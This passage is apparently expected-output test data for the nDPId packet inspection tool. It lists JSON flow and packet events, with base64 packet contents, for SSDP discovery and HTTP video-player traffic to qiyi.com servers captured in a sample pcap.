SIoeotU+nrZScO9ejGxvSfkni9AXlOWPv1zuo9rLJelhCyIJrC4Xn+WkzpkY6zFTV6\/5UunGX0Tb8Vczy7McXvGLjkrbiGj3QMStuCAUNlJpEVT8k65UrM5LwbEH4KAV5kUEs1eVMQu3tNilgdCCEWCCXyXIXhc7F8aNPdAP\/PS1DvzRFz2xUmcIICmQZ5HsVmrPOAorHnvum6saL0SZ4Xpsb2NtRcCkYo5ulH5R5LBdjwVak1WRQmaIpJTSuFDlTHmcUlO91XLgWqht8m4JPcT8KVxMhaep7\/D8rK0OPB4\/bZz3AmwRRkEn1w2WxcrplYcrA9llu+UUdElcjgIQb+8Ut3dZ78QhR6hg0LSfopHZZKMjm7H8PGYnnckV7+UPzMYjSuw2xH6Scc5NP4qyN1pRNyJqbAsYjU
9DQoRSV4QpLKW1o4cygA24ZnSsb0t8q6Ugh54j1Rk4AcTFxkKhm0GqVFfy3vqOZrj5LFm1yDiouv3X+Ev+I8njUSG1\/7yVhpxE8Ojwp45UwRLFQxvD31ZdmkgP4Weywok7EK11JBAomj+s4\/jGCJXIASa\/M"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353152692,"flow_last_seen":1467353152692,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353152692,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":1,"flow_last_seen":1467353152692,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353152692,"pkt":"AQBef\/\/6GF4PUugBCABFAAChLGwAAAER1wTAqAU57\/\/\/+ukAB2wAjbKhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} 00643{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1041,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353152692,"flow_last_seen":1467353152692,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":133,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353152692,"l3_proto":"ip4","src_ip":"192.168.5.57","dst_ip":"239.255.255.250","src_port":59648,"dst_port":1900,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00619{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1044,"source":"pps.pcap","alias":"nDPId-test","flow_id":55,"flow_packet_id":2,"flow_last_seen":1467353155693,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":175,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":175,"pkt_l4_len":141,"thread_ts_msec":1467353155693,"pkt":"AQBef\/\/6GF4PUugBCABFAAChLG0AAAER1wPAqAU57\/\/\/+ukAB2wAjbKhTS1TRUFSQ0ggKiBIVFRQLzEuMQ0KSG9zdDoyMzkuMjU1LjI1NS4yNTA6MTkwMA0KU1Q6dXJuOnNjaGVtYXMtdXBucC1vcmc6ZGV2aWNlOkludGVybmV0R2F0ZXdheURldmljZToxDQpNYW46InNzZHA6ZGlzY292ZXIiDQpNWDozDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-01291{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_packet_id":1,"flow_last_seen":1467353155790,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":683,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":683,"pkt_l4_len":649,"thread_ts_msec":1467353155790,"pkt":"TF4M6gNlABxCjnAxCABFAAKdDjtAAIAG3SfAqHMIymwO28U3AFCNS81scTxdzlAYAQSLywAAR0VUIC9jb3JlP3Q9MiZjaGlwaWQ9SW50ZWwlMjhSJTI5JTIwQ29yZSUyOFRNJTI5JTIwaTUlMkQyNTU3TSUyMENQVSUyMCU0MCUyMDElMkU3MEdIeiZ0bT0xNSZyYT0xJmlzaGNkbj0yJnBmPTIwMSZwPTExJnAxPTExNCZwMj0zMDAwJnNka3RwPTEmYzE9NiZyPTUwMDQ5NDYwMCZhaWQ9NTAyOTU5OTAwJnU9YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4mcHU9Jm9zPXdpbmRvd3Mmdj01JTJFMiUyRTE1JTJFMjI0MCZrcnY9MiUyRTAlMkUxMDImZHQ9Jmh1PS0xJnJuPTE0NjczNTMxNTUmaXNsb2NhbD0wJmFzPWQxOWY2NDA0N2I2NDFjZDZmZjA5NmIwNGZiMmEzMGI1JnZlPTNjYzBjOGZhMzcyNjI1ZTY0MTQzMTQ0ODE2ZjNlOTY4JnBlPWM5NWQ5OTJlMjk4NTZkYzg0ZjJlOTkwN2EyZTRiMjgyJnZmcm09JmNobD0maGNkbnY9MTAuMC4wLjI5MyZ0cGNkPTAmaXNkcm09MSZodD0wIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBtc2cuNzEuYW0NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOl8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} -01209{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1045,"source":"pps.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353155790,"flow_last_seen":1467353155790,"flow_idle_time":7440000,"flow_min_l4_payload_len":629,"flow_max_l4_payload_len":629,"flow_tot_l4_payload_len":629,"flow_avg_l4_payload_len":629,"midstream":1,"thread_ts_msec":1467353155790,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.108.14.219","src_port":50487,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Streaming"},"http": 
{"hostname":"msg.71.am","url":"msg.71.am\/core?t=2&chipid=Intel%28R%29%20Core%28TM%29%20i5%2D2557M%20CPU%20%40%201%2E70GHz&tm=15&ra=1&ishcdn=2&pf=201&p=11&p1=114&p2=3000&sdktp=1&c1=6&r=500494600&aid=502959900&u=aaoefdtqgfdepxc2tnv3piucgcb4eofn&pu=&os=windows&v=5%2E2%2E15%2E2240&krv=2%2E0%2E102&dt=&hu=-1&rn=1467353155&islocal=0&as=d19f64047b641cd6ff096b04fb2a30b5&ve=3cc0c8fa372625e64143144816f3e968&pe=c95d992e29856dc84f2e9907a2e4b282&vfrm=&chl=&hcdnv=10.0.0.293&tpcd=0&isdrm=1&ht=0","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00795{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":1,"flow_last_seen":1467353156641,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":311,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":311,"pkt_l4_len":277,"thread_ts_msec":1467353156641,"pkt":"TF4M6gNlABxCjnAxCABFAAEpDsFAAIAGbi7AqHMI3xpqFMU4AFDYI3WbArNbVVAYAQSIDAAAR0VUIC8yMDE2MDYyNS9hNS9iZi80MTNmOTFhZDEwMWU3ODBhNmI2M2Y4MjZlMjhiOTkyMC54bWwgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IG1ldGEudmlkZW8ucWl5aS5jb20NCkFjY2VwdDogKi8qDQpBY2NlcHQtRW5jb2Rpbmc6IGd6aXAsIGRlZmxhdGUNCnF5aWQ6YWFvZWZkdHFnZmRlcHhjMnRudjNwaXVjZ2NiNGVvZm4NCnF5cGlkOjUwMDQ5NDYwMF8yMDEyDQpxeXBsYXRmb3JtOjAtMg0KDQo="} 
-00834{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1046,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156641,"flow_last_seen":1467353156641,"flow_idle_time":7440000,"flow_min_l4_payload_len":257,"flow_max_l4_payload_len":257,"flow_tot_l4_payload_len":257,"flow_avg_l4_payload_len":257,"midstream":1,"thread_ts_msec":1467353156641,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.20","src_port":50488,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"meta.video.qiyi.com","url":"meta.video.qiyi.com\/20160625\/a5\/bf\/413f91ad101e780a6b63f826e28b9920.xml","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1047,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":2,"flow_last_seen":1467353156699,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":1314,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1314,"pkt_l4_len":1280,"thread_ts_msec":1467353156699,"pkt":"ABxCjnAxTF4M6gNlCABFAAUU\/f1AADgGwwbfGmoUwKhzCABQxTgCs1tV2CN2nFAQAB+1jgAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFFXUw0KRGF0ZTogRnJpLCAwMSBKdWwgMjAxNiAwNjowNTo1NiBHTVQNCkNvbnRlbnQtVHlwZTogdGV4dC94bWwNClRyYW5zZmVyLUVuY29kaW5nOiBjaHVua2VkDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpMYXN0LU1vZGlmaWVkOiBTYXQsIDI1IEp1biAyMDE2IDA2OjA4OjM2IEdNVA0KRXhwaXJlczogRnJpLCAwMSBKdWwgMjAxNiAwNjowNjo1MCBHTVQNCkNhY2hlLUNvbnRyb2w6IG1heC1hZ2U9MzAwDQpYLUNhY2hlOiBmcm9tIDEwLjEyMS4zNC4xNDANCkNvbnRlbnQtRW5jb2Rpbmc6IGd6aXANClgtQ2FjaGU6IEhJVCBmcm9tIDEwLjEyMS4zMy45OA0KWC1DYWNoZTogRVhQSVJFRCBmcm9tIDIyMy4yNi4xMDYuMjANCg0KNWZlDQofiwgAAAAAAAADhZnrbhs5DIX\/9ykCP8BEFC+SAHf6KIuxM26NzaWtnezl6fewDtIUXdIpUNvjY4n6SJHizPbT3w\/3Ny\/r99Px6fHjhqayufk0f9gejvfraT3PH262h\/uXm8flYf24KTtalr7wbmfrfuyoDO1dZLfXhdbdbj9BusFPbrZf1uPnL+
eZrWxvX9\/75b+Od+cvswmuXt76xfPxYT2dl4ev+6fH8\/Hx+en5NNP29v8uu\/yHZcd\/17kXbaXK9vbtin999\/x9OWMtM2mf2Nr29u2Kf\/1yvFuf\/jgvn+cyCv64+v8\/\/6i9vSfYWehwOKyE1ztrl8\/LXq1KWUo9HIYZXv1fv\/yMS7m8oyGt76nv1QfBl2p97WM51P1FWfhue\/vTGrdteb47vtp2GeSHha9yvCwHDMUDQ626qFw0uE5g8PO3PtKf6z+H73DZaf32vD7u15M75d3lHx9fyV\/eg8xy\/7zeHO\/g5s1cJowL+\/za7wK6JqibmaZR4xF4M3MqkM2sqUA3c0sFtpnHBEbhKhqMpAmeCxUdCk4VAwpNFQSa1HIJeNLIJSBac2MJTGtuLYFqvWIuuFabWuI7AtnacwnYcsklgMs1l4AuSyqpoMu5uRV0OTe3gq7k5lbQldzcCroikyUBVUFXLJeAriCyPXMG26+CroxJEx9V0NUyWRL+FXS1pqMw6KrkEtBVyyWgi1ycmcugayWXgK5RuiIGXeOpeHkJ0DHomkxI+rEEdM1yCehazyWga2OSxBYB3Ua5BHRbTeNFQLdJumgB3aaTJiEloNtaLvGMi6jLRgHdTrkEdDvnEtDtV8wF3Q5zkx2goNvhgGQ3KugOOCCTgO7gXAK6Q3MJ6I6WS0B3XDEXdKlcsRd4qdSpZ2sCXyoy4egTbgIFYCqWhpWBMJWea4CYCKeJZB8YGBPVXAPIRHmYGygTXbEZmImu2Oyc6xWbnXO9YrNzrldsds6otxmf5pxRcFONc0bFTTXOGSU31Thn1NxU45xRdFONc0bVzU6RzTnzSFN6c84ozek5zjmjNqca54zinGm6c0Z1bkmG685ZcJrINM4ZxTfVOGeldJ9256yca5yzaq5xztp+07y2WK+9gDdRX59OR++dLu2Cd0vve4JaK7qpoLCCS2Wy8Htn0uHJGipAhNHRUTwH"} -01353{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1048,"source":"pps.pcap","alias":"nDPId-test","flow_id":57,"flow_packet_id":3,"flow_last_seen":1467353156700,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":721,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":721,"pkt_l4_len":687,"thread_ts_msec":1467353156700,"pkt":"ABxCjnAxTF4M6gNlCABFAALD\/f5AADgGxVbfGmoUwKhzCABQxTgCs2BB2CN2nFAYAB9NTQAAeAj6KkVzGFgBGjLKoHgWsNDOg9EyBWMg4qw3sngWxFvTJslqEW1dOtsIZ\/G2YAiauUTisVZE0efGwzjXWg05LdZ4rAky0eBYc4m1ISOZy2PN0IHWZC6PtYYzQuJG8j0ND\/TECQTGtXRrmc2gXLGqInHIeH+AZh3hH4eENwhVsfKSjAPO1cTSYzk4VwRGT0LHe4TarWqyLm8S6mgVURj6q4IzFzPKNODMJE042ZbgzNQZongucObqtx3iTeOdAgtOFElsMDiz4j7IiGOewZkNmDWZyzNFp1ZHvEUZnLk3hGq8dm8XeCg2YczZ+wUeo3ON9wWDs+AA03qiAWdBguyZBpyFEaoU8\/GeQWCxJqlYwFm0ElwW+tS7BtGB8In5eNsgxoYYisfxnNwQiUliF8\/KHRWxxZwFnLGTCyWxIc55GI5LybrAWQsivsW+EHBWpMMucU7w7kGRWyyJeW8flHELMtOAswKQchyrCs6qvbWEs4Kz2mjW4n2q4IzsMyyJDQVn3LPtqKOhTxWcdXQc7RMNOFtBRUl8
4T0EvFVRbcO5vIcwFIPOsU8NnJExccMztsd7CARqqdlc4IxwNkRibA84m1Rl7rEGnA1No1kcPwbOptwRi\/E44GyK5JL0auaczVRLvE\/NOTdmsdhm7yG8mHJSC5pz7grS8T5tznl40Y3X3pwzVoX9E669gXMrSszJXODcCF1fS8YBZ9yrRE6I97v3EKimuN8fx2ED54ZUh6iPbQbnJlpQLEON9xDNzxJJTvAeopn2mnDu4Nya74w45js4t45NmNQ47yFa70xJ7u3OefiZN1kXOHesvIxf4\/Dy8OXXvmF7+\/b4wXuLdx\/fPY3AD+9f8Jzp8vDGHzT9Byu2GoeKGgAADQowDQoNCg=="} -00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00719{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":1,"flow_last_seen":1467353156959,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":253,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":253,"pkt_l4_len":219,"thread_ts_msec":1467353156959,"pkt":"TF4M6gNlABxCjnAxCABFAADvDvNAAIAGMe3AqHMId7wNvMU5AFAa+1ILYx41VVAYAQTDtAAAR0VUIC9rIEhUVFAvMS4xDQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiBwZGF0YS52aWRlby5xaXlpLmNvbQ0KQWNjZXB0OiAqLyoNCkFjY2VwdC1FbmNvZGluZzogZ3ppcCwgZGVmbGF0ZQ0KcXlpZDphYW9lZmR0cWdmZGVweGMydG52M3BpdWNnY2I0ZW9mbg0KcXlwaWQ6XzIwMTINCnF5cGxhdGZvcm06MC0yDQoNCg=="} 
-00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1049,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353156959,"flow_last_seen":1467353156959,"flow_idle_time":7440000,"flow_min_l4_payload_len":199,"flow_max_l4_payload_len":199,"flow_tot_l4_payload_len":199,"flow_avg_l4_payload_len":199,"midstream":1,"thread_ts_msec":1467353156959,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50489,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/k","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -00955{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1050,"source":"pps.pcap","alias":"nDPId-test","flow_id":58,"flow_packet_id":2,"flow_last_seen":1467353156998,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":430,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":430,"pkt_l4_len":396,"thread_ts_msec":1467353156998,"pkt":"ABxCjnAxTF4M6gNlCABFAAGgqmFAADQG4c13vA28wKhzCABQxTljHjVVGvtS0lAYAB+FPAAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L2h0bWwNCkNvbm5lY3Rpb246IGtlZXAtYWxpdmUNCkNvbnRlbnQtTGVuZ3RoOiAyMDQNCkNhY2hlLUNvbnRyb2w6IG5vLWNhY2hlDQoNCnsidCI6IjE0NjczNTMxNTYiLCJtIjoiZWMyZmQ2Njc4YTM1N2MyMDhkNTE4NmIzYzM0MjI0NmJlZTQ0YzUwY2U3MDgzOTNlIiwidSI6ImVjMmZkNjY3OGEzNTdjMjBmNTVhODJlZDYwZjYzZjk2Y2QyMDlhMWQ4OGI3ODQyNSIsImkiOiIyMjAuMTgxLjEwOS4zMyIsImsiOiJlYzJmZDY2NzhhMzU3YzIwNjI1MTY2M2U4NGQ3MDFkOTlkYjQyZTUxY2I5MWM1MzkifQ=="} 
-00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00855{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":1,"flow_last_seen":1467353157063,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":357,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":357,"pkt_l4_len":323,"thread_ts_msec":1467353157063,"pkt":"TF4M6gNlABxCjnAxCABFAAFXDwhAAIAGMXDAqHMId7wNvMU6AFAWZyP1RIzmWFAYAQR4owAAR0VUIC8yZWZjOGNkNWZiZTBmNGVlNDk4ZmIxYzJmYzFkZThiNi92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2PyZ0bj0xMzc3MTkgSFRUUC8xLjENClVzZXItQWdlbnQ6IFFZLVBsYXllci1XaW5kb3dzLzIuMC4xMDINCkhvc3Q6IHBkYXRhLnZpZGVvLnFpeWkuY29tDQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDpfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} 
-00894{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1051,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157063,"flow_last_seen":1467353157063,"flow_idle_time":7440000,"flow_min_l4_payload_len":303,"flow_max_l4_payload_len":303,"flow_tot_l4_payload_len":303,"flow_avg_l4_payload_len":303,"midstream":1,"thread_ts_msec":1467353157063,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"119.188.13.188","src_port":50490,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"pdata.video.qiyi.com","url":"pdata.video.qiyi.com\/2efc8cd5fbe0f4ee498fb1c2fc1de8b6\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?&tn=137719","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} -01021{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1052,"source":"pps.pcap","alias":"nDPId-test","flow_id":59,"flow_packet_id":2,"flow_last_seen":1467353157103,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":479,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":479,"pkt_l4_len":445,"thread_ts_msec":1467353157103,"pkt":"ABxCjnAxTF4M6gNlCABFAAHRefhAADQGEgZ3vA28wKhzCABQxTpEjOZYFmclJFAYAB\/Y6wAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IG5naW54LzEuOS40DQpEYXRlOiBGcmksIDAxIEp1bCAyMDE2IDA2OjA1OjU2IEdNVA0KQ29udGVudC1UeXBlOiB0ZXh0L3BsYWluDQpDb25uZWN0aW9uOiBrZWVwLWFsaXZlDQpDb250ZW50LUxlbmd0aDogMjUyDQpDYWNoZS1Db250cm9sOiBuby1jYWNoZQ0KDQp7InQiOiJPVkVSU0VBfFRXX0hpTmV0LTExOC4xNjMuOC45MCIsInoiOiJ0YWliZWlfb3RoZXIiLCJoIjoiLTcyIiwibCI6Imh0dHA6Ly8yMjMuMjYuMTA2LjY2L3ZpZGVvcy92MC8yMDE2MDYyNS9hNS9iZi84ZGU5YmI5NDY5NzJhODg1ODlkMTY2Nzg2MjI5MjEzMC5mNHY\/a2V5PTA3ZWVmMTgyMWUyMzc5ZDMxMzZmZmUxNjA4MjE4NWJhMiZzcmM9aXFpeWkuY29tJiZ0bj0xMzc3MTkmdXVpZD03NmEzMDg1YS01Nzc2MDg0NC1kZSIsImUiOiIwIn0="} 
-00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7440000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"thread_ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00947{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_packet_id":1,"flow_last_seen":1467353157138,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":426,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":426,"pkt_l4_len":392,"thread_ts_msec":1467353157138,"pkt":"TF4M6gNlABxCjnAxCABFAAGcDxlAAIAGbTXAqHMI3xpqQsU7AFAuAjEcSma44VAYAQTWMgAAR0VUIC92aWRlb3MvdjAvMjAxNjA2MjUvYTUvYmYvOGRlOWJiOTQ2OTcyYTg4NTg5ZDE2Njc4NjIyOTIxMzAuZjR2P2tleT0wN2VlZjE4MjFlMjM3OWQzMTM2ZmZlMTYwODIxODViYTImc3JjPWlxaXlpLmNvbSYmdG49MTM3NzE5JnV1aWQ9NzZhMzA4NWEtNTc3NjA4NDQtZGUgSFRUUC8xLjENClJhbmdlOiBieXRlcz0wLTQwOTU5DQpVc2VyLUFnZW50OiBRWS1QbGF5ZXItV2luZG93cy8yLjAuMTAyDQpIb3N0OiAyMjMuMjYuMTA2LjY2DQpBY2NlcHQ6ICovKg0KQWNjZXB0LUVuY29kaW5nOiBnemlwLCBkZWZsYXRlDQpxeWlkOmFhb2VmZHRxZ2ZkZXB4YzJ0bnYzcGl1Y2djYjRlb2ZuDQpxeXBpZDo1MDA0OTQ2MDBfMjAxMg0KcXlwbGF0Zm9ybTowLTINCg0K"} 
-01049{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1053,"source":"pps.pcap","alias":"nDPId-test","flow_id":60,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353157138,"flow_last_seen":1467353157138,"flow_idle_time":7440000,"flow_min_l4_payload_len":372,"flow_max_l4_payload_len":372,"flow_tot_l4_payload_len":372,"flow_avg_l4_payload_len":372,"midstream":1,"thread_ts_msec":1467353157138,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"223.26.106.66","src_port":50491,"dst_port":80,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"223.26.106.66","url":"223.26.106.66\/videos\/v0\/20160625\/a5\/bf\/8de9bb946972a88589d1667862292130.f4v?key=07eef1821e2379d3136ffe16082185ba2&src=iqiyi.com&&tn=137719&uuid=76a3085a-57760844-de","code":0,"content_type":"","user_agent":"QY-Player-Windows\/2.0.102"}} 
